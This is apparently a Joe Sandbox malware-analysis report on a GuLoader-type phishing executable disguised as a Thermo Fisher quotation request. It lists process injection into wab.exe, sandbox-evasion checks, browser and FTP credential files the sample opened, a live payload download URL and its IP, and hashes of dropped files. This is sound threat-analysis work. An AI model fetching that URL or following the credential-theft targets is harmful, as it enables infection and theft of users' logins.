        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeAPI/Special instruction interceptor: Address: 780F23A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 6C2F23A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 29A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 37C20000 memory reserve | memory write watchJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 37B00000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\UserInfo.dllJump to dropped file
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\nsDialogs.dllJump to dropped file
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\nsExec.dllJump to dropped file
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\LangDLL.dllJump to dropped file
        Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
        Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeCode function: 0_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_00405C60
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeCode function: 0_2_004068B1 FindFirstFileW,FindClose,0_2_004068B1
        Source: wab.exe, 00000002.00000002.91546935226.0000000007BB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWq
        Source: wab.exe, 00000002.00000002.91546935226.0000000007BB6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.91546935226.0000000007B48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeAPI call chain: ExitProcess graph end nodegraph_0-4825
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeAPI call chain: ExitProcess graph end nodegraph_0-4832
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeCode function: 0_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_00405C60
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeCode function: 0_2_6FE71BFF LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FE71BFF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3E60000Jump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 29AFEB0Jump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeCode function: 0_2_0040352F EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_0040352F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
        Source: Yara matchFile source: 00000002.00000002.91557808162.0000000037C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2668, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        Access Token Manipulation
        1
        Masquerading
        2
        OS Credential Dumping
        211
        Security Software Discovery
        Remote Services1
        Email Collection
        11
        Encrypted Channel
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Native API
        Boot or Logon Initialization Scripts111
        Process Injection
        12
        Virtualization/Sandbox Evasion
        1
        Credentials in Registry
        12
        Virtualization/Sandbox Evasion
        Remote Desktop Protocol1
        Archive Collected Data
        1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading
        1
        Disable or Modify Tools
        Security Account Manager2
        File and Directory Discovery
        SMB/Windows Admin Shares2
        Data from Local System
        2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Access Token Manipulation
        NTDS126
        System Information Discovery
        Distributed Component Object Model1
        Clipboard Data
        13
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
        Process Injection
        LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Obfuscated Files or Information
        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        Thermo Fisher RFQ_TFS-1207.com.exe50%ReversingLabsWin32.Trojan.Generic
        Thermo Fisher RFQ_TFS-1207.com.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\LangDLL.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\UserInfo.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\nsDialogs.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\nsExec.dll0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://crl.comodo0%Avira URL Cloudsafe
        https://synergyinnovationsgroup.com/100%Avira URL Cloudphishing
        https://synergyinnovationsgroup.com/wPKxzs124.bin100%Avira URL Cloudphishing
        https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
        https://synergyinnovationsgroup.com/wPKxzs124.bint#100%Avira URL Cloudphishing
        http://www.quovadis.bm00%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
        https://synergyinnovationsgroup.com/B100%Avira URL Cloudphishing
        NameIPActiveMaliciousAntivirus DetectionReputation
        synergyinnovationsgroup.com
        199.217.106.226
        truefalse
          unknown
          NameMaliciousAntivirus DetectionReputation
          https://synergyinnovationsgroup.com/wPKxzs124.binfalse
          • Avira URL Cloud: phishing
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://synergyinnovationsgroup.com/wab.exe, 00000002.00000002.91546935226.0000000007BA6000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          unknown
          http://www.quovadis.bm0wab.exe, 00000002.00000003.87350938273.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.91546935226.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.87351216123.0000000007BD1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://synergyinnovationsgroup.com/wPKxzs124.bint#wab.exe, 00000002.00000002.91546935226.0000000007B48000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          unknown
          http://nsis.sf.net/NSIS_ErrorErrorThermo Fisher RFQ_TFS-1207.com.exe, 00000000.00000000.86449721470.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Thermo Fisher RFQ_TFS-1207.com.exe, 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://ocsp.quovadisoffshore.com0wab.exe, 00000002.00000003.87350938273.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.91546935226.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.87351216123.0000000007BD1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://crl.comodowab.exe, 00000002.00000003.87350938273.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.87351216123.0000000007BD1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://synergyinnovationsgroup.com/Bwab.exe, 00000002.00000002.91546935226.0000000007BA6000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          199.217.106.226
          synergyinnovationsgroup.comUnited States
          33083AXCELX-NETUSfalse
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1501414
          Start date and time:2024-08-29 21:53:05 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 14m 37s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
          Run name:Suspected Instruction Hammering
          Number of analysed new started processes analysed:4
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:Thermo Fisher RFQ_TFS-1207.com.exe
          Detection:MAL
          Classification:mal100.troj.spyw.evad.winEXE@3/13@1/1
          EGA Information:
          • Successful, ratio: 50%
          HCA Information:
          • Successful, ratio: 93%
          • Number of executed functions: 96
          • Number of non-executed functions: 27
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
          • Execution Graph export aborted for target wab.exe, PID 2668 because it is empty
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: Thermo Fisher RFQ_TFS-1207.com.exe
          No simulations
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          199.217.106.226AWB 9869692024 Clearance Doc.exeGet hashmaliciousRemcos, GuLoaderBrowse
          • www.manjeetsteelproductions.com/YBEZddPio157.bin
          Payment Copy 486667.exeGet hashmaliciousRemcos, GuLoaderBrowse
          • www.manjeetsteelproductions.com/larVuzdzFnPsjspJSGQvhHyIW255.bin
          TRIAL_ORDER_OTHERS.exeGet hashmaliciousFormBook, GuLoaderBrowse
          • synexenergygroup.net/PnbzhHImguIPb128.bin
          IMG_INVENTORY_LIST.exeGet hashmaliciousFormBook, GuLoaderBrowse
          • synexenergygroup.net/ZdeTTaG65.bin
          Request For Quotation 34333.exeGet hashmaliciousRemcos, GuLoaderBrowse
          • www.manjeetsteelproductions.com/IRrnYokuAbeBX51.bin
          FedEX Arrival - AWB# 102235508763.exeGet hashmaliciousGuLoaderBrowse
          • www.manjeetsteelproductions.com/fOdHnpSDXn91.bin
          Pepsico Company Profile.exeGet hashmaliciousGuLoaderBrowse
          • www.synergyinnovationsgroup.com/vWyDrlGiCMSupEsdddOxmUDB222.bin
          SecuriteInfo.com.FileRepMalware.11227.27096.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
          • www.synergyinnovationsgroup.com/WJIlwQHyz37.bin
          SecuriteInfo.com.FileRepMalware.15088.20650.exeGet hashmaliciousGuLoaderBrowse
          • www.synergyinnovationsgroup.com/ohhzRs20.bin
          FedEX Arrival - AWB# 102235506763.exeGet hashmaliciousRemcos, GuLoaderBrowse
          • manjeetsteelproductions.com/rtGfK70.bin
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          synergyinnovationsgroup.comYMOqAm713i.exeGet hashmaliciousGuLoaderBrowse
          • 199.217.106.226
          mbdcKkZ3Ag.exeGet hashmaliciousGuLoaderBrowse
          • 199.217.106.226
          BCXV7eBAlV.exeGet hashmaliciousGuLoaderBrowse
          • 199.217.106.226
          sihost.exeGet hashmaliciousGuLoaderBrowse
          • 199.217.106.226
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          AXCELX-NETUSYMOqAm713i.exeGet hashmaliciousGuLoaderBrowse
          • 199.217.106.226
          mbdcKkZ3Ag.exeGet hashmaliciousGuLoaderBrowse
          • 199.217.106.226
          AWB 9869692024 Clearance Doc.exeGet hashmaliciousRemcos, GuLoaderBrowse
          • 199.217.106.226
          Payment Copy 486667.exeGet hashmaliciousRemcos, GuLoaderBrowse
          • 199.217.106.226
          TRIAL_ORDER_OTHERS.exeGet hashmaliciousFormBook, GuLoaderBrowse
          • 199.217.106.226
          IMG_INVENTORY_LIST.exeGet hashmaliciousFormBook, GuLoaderBrowse
          • 199.217.106.226
          Request For Quotation 34333.exeGet hashmaliciousRemcos, GuLoaderBrowse
          • 199.217.106.226
          HSBC Advice_ACH Credit.com.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
          • 199.217.106.226
          FedEX Arrival - AWB# 102235508763.exeGet hashmaliciousGuLoaderBrowse
          • 199.217.106.226
          sihost.exeGet hashmaliciousGuLoaderBrowse
          • 199.217.106.226
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousVidarBrowse
          • 199.217.106.226
          Invoice.wsfGet hashmaliciousAsyncRAT, PureLog StealerBrowse
          • 199.217.106.226
          x64_installer__v4.6.0.msiGet hashmaliciousUnknownBrowse
          • 199.217.106.226
          SHIPMENT_DOCMSS24071327.exeGet hashmaliciousGuLoaderBrowse
          • 199.217.106.226
          hhs.exeGet hashmaliciousUnknownBrowse
          • 199.217.106.226
          x64_installer__v4.5.9.msiGet hashmaliciousUnknownBrowse
          • 199.217.106.226
          3Ojkq6hcM1.msiGet hashmaliciousUnknownBrowse
          • 199.217.106.226
          Nettably.exeGet hashmaliciousSnake KeyloggerBrowse
          • 199.217.106.226
          WEAREX_IHRACAT.exeGet hashmaliciousGuLoaderBrowse
          • 199.217.106.226
          Fordybendes.exeGet hashmaliciousAzorult, GuLoaderBrowse
          • 199.217.106.226
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dllTRIAL_ORDER_CP.exeGet hashmaliciousFormBook, GuLoaderBrowse
            TRIAL_ORDER_CP.exeGet hashmaliciousGuLoaderBrowse
              Thermo Fisher RFQ_TFS-1805.xlsGet hashmaliciousGuLoaderBrowse
                FedEx Shipping Confirmation.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                  IMG_00991ORDER_FILES.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    FedEx Shipping Confirmation.exeGet hashmaliciousGuLoaderBrowse
                      IMG_00991ORDER_FILES.exeGet hashmaliciousGuLoaderBrowse
                        SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsxGet hashmaliciousUnknownBrowse
                          AKgHw6grDP.exeGet hashmaliciousGuLoaderBrowse
                            C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\LangDLL.dllTRIAL_ORDER_CP.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              TRIAL_ORDER_CP.exeGet hashmaliciousGuLoaderBrowse
                                Thermo Fisher RFQ_TFS-1805.xlsGet hashmaliciousGuLoaderBrowse
                                  FedEx Shipping Confirmation.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                    IMG_00991ORDER_FILES.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      FedEx Shipping Confirmation.exeGet hashmaliciousGuLoaderBrowse
                                        IMG_00991ORDER_FILES.exeGet hashmaliciousGuLoaderBrowse
                                          SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsxGet hashmaliciousUnknownBrowse
                                            Process:C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):385015
                                            Entropy (8bit):1.253279247179919
                                            Encrypted:false
                                            SSDEEP:1536:kVTcKVFuJi5LXKLywcEhXygCilGHIQXMUmMAI:ywKLNLaLywRXygCilGzmMAI
                                            MD5:84182132BEAC6B4CDD42AE3C3504778F
                                            SHA1:9844B9B4ABEAC7B410809A582FE2E41BD38876A3
                                            SHA-256:5A2A01A88EC9FF56B80D957E4C5891A020435407F81DADA05DE58165C0C86F2D
                                            SHA-512:054C17E8AC2EDED927F24E77A81FBA74498C9F3ABD07F5E42D6F9E20A58D47D9C30FF1060CC8626DE93FDD5BBA2A0503FF61EC7F4F70858871C15E63DDC48A7F
                                            Malicious:false
                                            Reputation:low
                                            Preview:....E..........;................../..r.....5...............e......9...............................S............................................e..........................E..........................W.................................8....................j......3....................X............................Ql....T.................>g...'.............[...l...P.................................|................................q.....................3........v......t....H............................................s.................................................................................................................................................f....................................................................(..................................................;..$..................................................................o.-.........................................................l................. ...............................................Q......................
                                            Process:C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):295052
                                            Entropy (8bit):7.649643489698229
                                            Encrypted:false
                                            SSDEEP:6144:d5dDGsxj8/O4S6dAWxD5cHH3B3BZY8cdP5t2Z0:RD38/NBAW0HX3ZY86Bt+0
                                            MD5:87FC203CBBB62A9A54DF6DC6C05746DC
                                            SHA1:17FD595731DD4A17400EB51A1ED4DFE553DD5B8C
                                            SHA-256:F0C74501FA71948FD95D65EEA5697D3E5CED4D8F507F053D355C3A333DD0A29E
                                            SHA-512:08ED5ACC005284E127FDC2B76B2C19D9C86A65DB20DBEB8D6360CF4CEC263D199C095AC9DCC7858A756515C77B75221490DE9D4D605DB06C66D76A097B10AE6D
                                            Malicious:false
                                            Reputation:low
                                            Preview:............55....a........+......................yy.........................E......nnnnnn.|......%.....}...jj.;.~~~....................D.......xxx.BBBBBB........,...tt.............................W..mm..p.."""..N................OO...............!!..]......x.k.XXX.'...............................N.c.}........%%...............R....ll.......Z................&...............55.h........uu.................::...........(((.a.X..........gg.....N.U......tt..ZZZ...................x.......aa................... ..............??...kkk.....ssss....uu.........................A............i.......................................................................X.......NNN........x.0....5555......99.....>>>>>..............V.....SSS...................11..G.....................'.a..............._...............A..00..............88..............................^..?..........................vv..JJJJJJJJ............w....jjj.....................!..........hhh.ll........)))))...".k..........>.....%%%%......
                                            Process:C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
                                            File Type:ASCII text, with very long lines (304), with no line terminators
                                            Category:dropped
                                            Size (bytes):304
                                            Entropy (8bit):4.14301130689188
                                            Encrypted:false
                                            SSDEEP:6:3CUzIrGx4igCDYUuTjAtLGafWWl2iEOQkAtj/jLsTzOwJT4HCALn:3CCF4igCDYA5Ga+Wl2iEOTAJryO8MHCu
                                            MD5:EF6FDEDE5EA8DBEF391FEC35BE82A5FC
                                            SHA1:6C88262F78E8B11651EEB6534F09C65CD0A8F8BB
                                            SHA-256:37B39724FD3B7FE48E1D65DA1A69BF4DBF809F34C67BAC7C4DA13F93DA9BE856
                                            SHA-512:5FB53ADEADB7C464A13EEECE64ADD35F972425D55447FFB84A277689BA3F4D5861A43B2883CB0744F98F164F2802C567F9969F777B98CE4609D28A64ED1101FD
                                            Malicious:false
                                            Reputation:low
                                            Preview:skydestigens dilettanist defmrkers,drmmene sprometrets taklingens crokinole ligegladestes,ultraremuneration dkketallerkners uncustomed filoversigterne.atomize koncentrationsevnens arthropodal epilepsis vakuums stabelvis lnregulering,catv skrivemaskinebordenes skydningerne.solanin godkendelsens gasogene.
                                            Process:C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):269664
                                            Entropy (8bit):1.2446463566225683
                                            Encrypted:false
                                            SSDEEP:768:3wSokH49c7ZKiDm+1Qer3C4XkGB3luG3fCHoEHKM/yP35tuIJ95oV31XfCp43UtM:55+1GbuKvP32IqV1fmPU0VicgRx
                                            MD5:084CDF1FE8920EACBC8DC0E839D9E5A7
                                            SHA1:5BB2E4E15941AC2AB4287A58F671B82DA5C9A384
                                            SHA-256:A6EB01651C833919FC27F9B7DD2B5C6D9F9DD8766BC7848679B5E664ECC6C8A7
                                            SHA-512:F856C41F540B7BD8233179CC752E63E4C88C1BBC38739B4FAF3DA09675B13FBC0219458AFE95D4C1DD481B35BB69DC9B66C2269C64B106DE3659A51CE9AE1B42
                                            Malicious:false
                                            Reputation:low
                                            Preview:...E.......c...............................0...............................................................c........................................n.......Y................................P..........................................................................................$........................................~.........................1...Z....................................m......................=.......................U............................................[....................................}.=..................-..........................................................t........................-....................m..............V...................................................................q............m.X..................................c....................................................................................'.........................T...R.............................................................^............|................................
                                            Process:C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):131403
                                            Entropy (8bit):1.2526174536345023
                                            Encrypted:false
                                            SSDEEP:768:GGj5fMy6uanycN+gN/qEN+bHeC6roJdAGpeBgXU9ZWNAnu/Fkutb:L3l0fDkwaPA
                                            MD5:9AD6681DD2B309E6ACE142096F9E2870
                                            SHA1:5E02434342A98589A29B7E389E88DD4C60F09A8A
                                            SHA-256:576D2CD521891CF9C598B3CA0DADB89BD36CDE96B3F86F1CD27BF4FFCCE863CB
                                            SHA-512:28CFECE5E00AAB59758864503F4A9058EEF2FDFC8B73204ABF1E3B41011FBE5D9EAC3595E2EFA0E3B740B82F285B7EC8E42EA5DD42C39E5EFF39735A9C051CBB
                                            Malicious:false
